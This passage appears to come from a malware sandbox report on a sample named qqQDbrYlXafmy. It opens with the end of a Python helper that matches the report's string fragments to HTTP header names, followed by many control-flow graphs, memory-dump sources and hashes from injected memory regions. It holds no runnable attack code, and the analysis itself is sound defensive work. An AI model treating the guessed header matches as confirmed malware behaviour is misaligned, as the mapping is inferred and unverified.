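    the function compares something the candidate list does not cover."""
    used = {c.rstrip() for chunks in matches.values() for c in chunks}
    return [f for f in fragments if f.rstrip() not in used]


if __name__ == "__main__":
    frags = parse_string_id(REPORT_STRING_ID)
    found = match_headers(frags, CANDIDATE_HEADERS)
    for header, chunks in found.items():
        print(f"{header!r:16} <- {chunks}")
    print("unexplained:", unexplained(frags, found))
```

Requiring every chunk of a candidate to be present is what keeps Cook and ie: from also being credited to "Set-Cookie: " (whose first chunk, Set-, is absent). Because trailing whitespace is ignored, a fragment can be credited to a chunk that differs only in trailing spaces; for header names ending in ": " that is the intended behaviour, but it is a loosening to keep in mind when the candidate list grows.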

Control-flow Graph
control_flow_graph 0 2b2093e-2b2095f call 2b20cc4 call 2b214bc call 2b23cc0 8 2b20967-2b20989 0->8 10 2b20af1-2b20af2 8->10 11 2b2098f-2b209d2 call 2b209d9 8->11 15 2b209d4-2b209d5 11->15 16 2b20a3d-2b20a76 11->16 17 2b209d7-2b209e8 call 2b23653 15->17 18 2b20a3c 15->18 19 2b20a7e-2b20a80 16->19 22 2b20aec call 2b20af3 17->22 30 2b209ee-2b20a10 17->30 18->16 21 2b20a82-2b20aae 19->21 19->22 21->22 27 2b20ab0-2b20abc 21->27 22->10 31 2b20ac1-2b20ae5 27->31 30->22 33 2b20a16-2b20a3b 30->33 31->10 37 2b20ae7-2b20aea 31->37 33->22 38 2b20a41-2b20a76 33->38 37->22 37->31 38->19
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 642f0cdef30638ee7e62bd0d56a159d3420231687b5fb4dd34291ed8c833b41b
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 3D51C0312443649FEB23AF20CC84B9A37B8EF15744F4805D9BA49FE0D6DBB09684CB65
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 39 2b214bc-2b214df call 2b214de 42 2b21502-2b21590 call 2b21345 * 6 39->42 43 2b214e1-2b21500 call 2b20c9c 39->43 43->42
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
• Instruction ID: e55ef4867d02beea403e1c7b5f4bacc5d535b8e99771bd5a4702776a73be1278
• Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
• Instruction Fuzzy Hash: CF210172404624AEDF03AF60C9C8CA673EDEF40704F4545AA9D8DEF04AFA709158CEE6
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 59 2b21345-2b21352 60 2b213eb-2b213ec 59->60 61 2b21358-2b2135e 59->61 61->60 62 2b21364-2b2137a 61->62 62->60 64 2b2137c-2b2138f 62->64 66 2b21391-2b21398 64->66 67 2b2139b-2b213ab call 2b20e7c 66->67 70 2b213ad-2b213e2 67->70 70->60
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 57eee09f676bfc3de9cfc0e7dc3b537727d2dab2a8cbc9f94935fc7a68492dd7
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: BE21AE31904326AFEF21DE78C944B9DBBB6AF04300F058255F959BB595D730A805CB94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 2b214de-2b21590 not reproduced)
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction ID: 031a0f4533b5e31e3df3590ff3562678bc1a23f6da9b7f0fbac87eabe73d37f6
• Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction Fuzzy Hash: A3118F72404624AEEF03AF64C5C8CAA73EDEF40704B4549AA9D89EF449FE709158CEE5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 2b23f0d-2b23f29 not reproduced)
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction ID: 41f751963cd2f988637d53eb1f9e227c3888f00b0c639003b9c73588746c20f5
• Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction Fuzzy Hash: 45F08C305883A0ABEF00BBB0AC4966D32F9AF00305F0400D0AA8DAD0E0CE3C85988E71
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 2b24674-2b2468d not reproduced)
Strings
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: a1c6371f28839a5899eb18149f578d75d5d5b74d8f2e64f8a6457625748807fc
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: DF4183B6600218BFEF129F65CC44BDEBFBAEF80704F1540A9EA44AA254D774D644CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 2b24675-2b24680 not reproduced)
Strings
Memory Dump Source
• Source File: 00000028.00000002.2924558758.0000000002B20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2b20000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: 4c2a36df15a473cc6d4190318ef4517f0fb4ec64f4b452ce57c8f71c776fb928
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 304193B6600218BFEF125F65CC48BDEBFBAEF80704F1540A9EA44AA254D774D644CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 145093e-145095f not reproduced)
Memory Dump Source
• Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 512fe28a7c623139a11723c52dc63ae868d0efa37cdbdbabb673543e91c5cbd3
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 335191315442549FFF235F24CC85B9A7BB8AF14744F08019ABE49FE0E6DAB09990CA65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 14514bc-1451590 not reproduced)
Memory Dump Source
• Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
• Instruction ID: 6ca4c6c738d11e316478e1a65a6e7f3bb2c0cf25c202b65e81bf9a1fd8eefce5
• Opcode Fuzzy Hash: 4e971aff2dee82d23a3358c9d971b96922ba5f2b56971bbf18b19d5fda69c74c
• Instruction Fuzzy Hash: C4213072404614AEEB43AF60C8C8DA773ECEF50604F45096B9D85EF05AFEB09154CAE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 1451345-1451352 not reproduced)
Memory Dump Source
• Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 28ef556e5b0b4e396fd6580e3d33d480efc1ab3297ce517190c884814b5dcf67
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: 2D219031904216AFEB119F78C884B5DBFB5AF04710F154216FE55BB6A6D770E810CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph image for function 14514de-1451590 not reproduced)
Memory Dump Source
• Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                                          • Instruction ID: 8ea9f74e74ec5545e2bc3b3c37fb6e2c5b015d37981f73cc56da6a5f9edf9629
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E1119724046149EEF43AF60C5C8CAA73ECEE50A04B4509AF9D89EF04AFFB09154CAE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 1453f0d-1453f29 call 1453653 call 145379f 92 1453f3b-1453f66 call 1453f78 * 3 87->92 93 1453f2b-1453f39 call 145401b 87->93 106 1453f71 92->106 100 1453f76-1453f77 93->100 106->100 107 1453f71 call 1453f78 106->107 107->100
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 6e2ae39abecfc5bd3c14e309ea4f453323a3400e44427bb894d381aa4d7aa458
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF08272588241A6FF813FB19C5960936B47F70785F04009AAEC9AD0F2DE3055508E70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 1454675-145468d call 1453a1c 136 145469d-14546cd 133->136 137 145468f-1454698 call 1453a6e 133->137 140 14547e7-14547ec 136->140 141 14546d3-14546f5 136->141 137->136 141->140 143 14546fb-1454720 141->143 145 1454722-1454737 143->145 146 1454738-145475a 143->146 145->146 148 145475c-145477e 146->148 149 14547bf-14547c9 146->149 148->149 154 1454780-14547a2 148->154 150 14547e0-14547e5 149->150 151 14547cb-14547dd call 1453673 149->151 150->140 151->150 154->149 157 14547a4-14547bc 154->157 157->149
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: eaa47e726d27a5623d1dc96f413d721acfcf76ffb1abe7c6b36afa36a965c373
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 514172B6500208BFEF125FA9CC48BDEBFB9FF80744F154069EA44AA255E734D690CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 1454674-1454680 109 145468b-145468d 108->109 110 1454686 call 1453a1c 108->110 111 145469d-14546cd 109->111 112 145468f-1454698 call 1453a6e 109->112 110->109 115 14547e7-14547ec 111->115 116 14546d3-14546f5 111->116 112->111 116->115 118 14546fb-1454720 116->118 120 1454722-1454737 118->120 121 1454738-145475a 118->121 120->121 123 145475c-145477e 121->123 124 14547bf-14547c9 121->124 123->124 129 1454780-14547a2 123->129 125 14547e0-14547e5 124->125 126 14547cb-14547dd call 1453673 124->126 125->115 126->125 129->124 132 14547a4-14547bc 129->132 132->124
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: 9e6816cd8eddef315fcdaec5945646d9de88ab1c922627bf52c489c77d46535c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D24185B6500208BFEF129FA5CC44BEEBFB9FF80744F154069EA44AA255D734D690CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 262093e-262095f call 2620cc4 call 26214bc call 2623cc0 8 2620967-2620989 0->8 10 2620af1-2620af2 8->10 11 262098f-26209d2 call 26209d9 8->11 15 26209d4-26209d5 11->15 16 2620a3d-2620a80 11->16 17 26209d7-26209e8 call 2623653 15->17 18 2620a3c 15->18 21 2620a82-2620aae 16->21 22 2620aec call 2620af3 16->22 17->22 29 26209ee-2620a10 17->29 18->16 21->22 27 2620ab0-2620abc 21->27 22->10 31 2620ac1-2620ae5 27->31 29->22 33 2620a16-2620a3b 29->33 31->10 37 2620ae7-2620aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 36843993a34071c36a95438efac339e6c0b747574a383a4d0107ca741889c638
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: E051C0316442649FEB239F20CC84B9A37BCAF04744F4401D9BA49FE0D6DBB09694CF69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 26214bc-2621590 call 26214de call 2620c9c call 2621345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction ID: 85a25ab8c439bcf41c71c95de6a7f0432f61dd859ed9c794b2d1b669e1c63715
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A210372404A249EDF03AF60C9C8CA673EDEF40704F4505AA9D89EF049FA709158CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 57 2621345-2621352 58 26213eb-26213ec 57->58 59 2621358-262135e 57->59 59->58 60 2621364-262137a 59->60 60->58 62 262137c-262138f 60->62 64 2621391-2621398 62->64 65 262139b-26213ab call 2620e7c 64->65 68 26213ad-26213e2 65->68 68->58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 45a9de386e907e368012b3462271b9e95afc4a8789193f67b9d0643b7f6fc56c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E421AE31904226AFEF219E78C944B9DBBB6AF05300F058255F959BB695DB30A904CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 26214de-2621590 call 2623653 call 2620c9c call 2621345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction ID: 3f8643b4fea238a52d51d606d901979c36363c308cf9ccdb725598d14410af8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 171182724049249EDF03AF60C5C8CA673EDEF40704B4509AE9D89EF449FE719158CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 2623f0d-2623f29 call 2623653 call 262379f 92 2623f3b-2623f66 call 2623f78 * 3 87->92 93 2623f2b-2623f39 call 262401b 87->93 106 2623f71 92->106 101 2623f76-2623f77 93->101 106->101 107 2623f71 call 2623f78 106->107 107->101
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction ID: a2d0bc20bcff1afa7cecb09308dcf8f468c98985e5b0defe1d41980f0e626800
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0A7305886A0A7FF007F70AC4975D32B95F00305F0400D4E949BD2D0CF3885788E79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 2624674-262468d call 2623a1c 111 262468f-2624698 call 2623a6e 108->111 112 262469d-26246cd 108->112 111->112 115 26246d3-26246f5 112->115 116 26247e7-26247ec 112->116 115->116 118 26246fb-2624720 115->118 120 2624722-2624737 118->120 121 2624738-262475a 118->121 120->121 123 26247bf-26247c9 121->123 124 262475c-262477e 121->124 125 26247e0-26247e5 123->125 126 26247cb-26247dd call 2623673 123->126 124->123 129 2624780-26247a2 124->129 125->116 126->125 129->123 132 26247a4-26247bc 129->132 132->123
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: 93c96e7adf28cd558c46a1101ca51478e7f72e507a8b0d133227b1d30ddd0ae3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 624193B6600618BFEF129F64CC84BDEBFBAEF80704F154069EA44AA254DB34D644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 2624675-2624680 134 262468b-262468d 133->134 135 2624686 call 2623a1c 133->135 136 262468f-2624698 call 2623a6e 134->136 137 262469d-26246cd 134->137 135->134 136->137 140 26246d3-26246f5 137->140 141 26247e7-26247ec 137->141 140->141 143 26246fb-2624720 140->143 145 2624722-2624737 143->145 146 2624738-262475a 143->146 145->146 148 26247bf-26247c9 146->148 149 262475c-262477e 146->149 150 26247e0-26247e5 148->150 151 26247cb-26247dd call 2623673 148->151 149->148 154 2624780-26247a2 149->154 150->141 151->150 154->148 157 26247a4-26247bc 154->157 157->148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: 05e6525e032cf75ec52e11297d9a8d63066c71a5b4cf809cc2a330e54ce585bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C41C3B6600618BFEF125F64CC48BDEBFBAEF80704F144068EA44AA254DB30D644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 ee093e-ee095f call ee0cc4 call ee14bc call ee3cc0 8 ee0967-ee0989 0->8 10 ee098f-ee09d2 call ee09d9 8->10 11 ee0af1-ee0af2 8->11 15 ee0a3d-ee0a76 10->15 16 ee09d4-ee09d5 10->16 17 ee0a7e-ee0a80 15->17 18 ee0a3c 16->18 19 ee09d7-ee09e8 call ee3653 16->19 21 ee0aec call ee0af3 17->21 22 ee0a82-ee0aae 17->22 18->15 19->21 30 ee09ee-ee0a10 19->30 21->11 22->21 27 ee0ab0-ee0abc 22->27 31 ee0ac1-ee0ae5 27->31 30->21 34 ee0a16-ee0a3b 30->34 31->11 37 ee0ae7-ee0aea 31->37 34->21 38 ee0a41-ee0a76 34->38 37->21 37->31 38->17
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
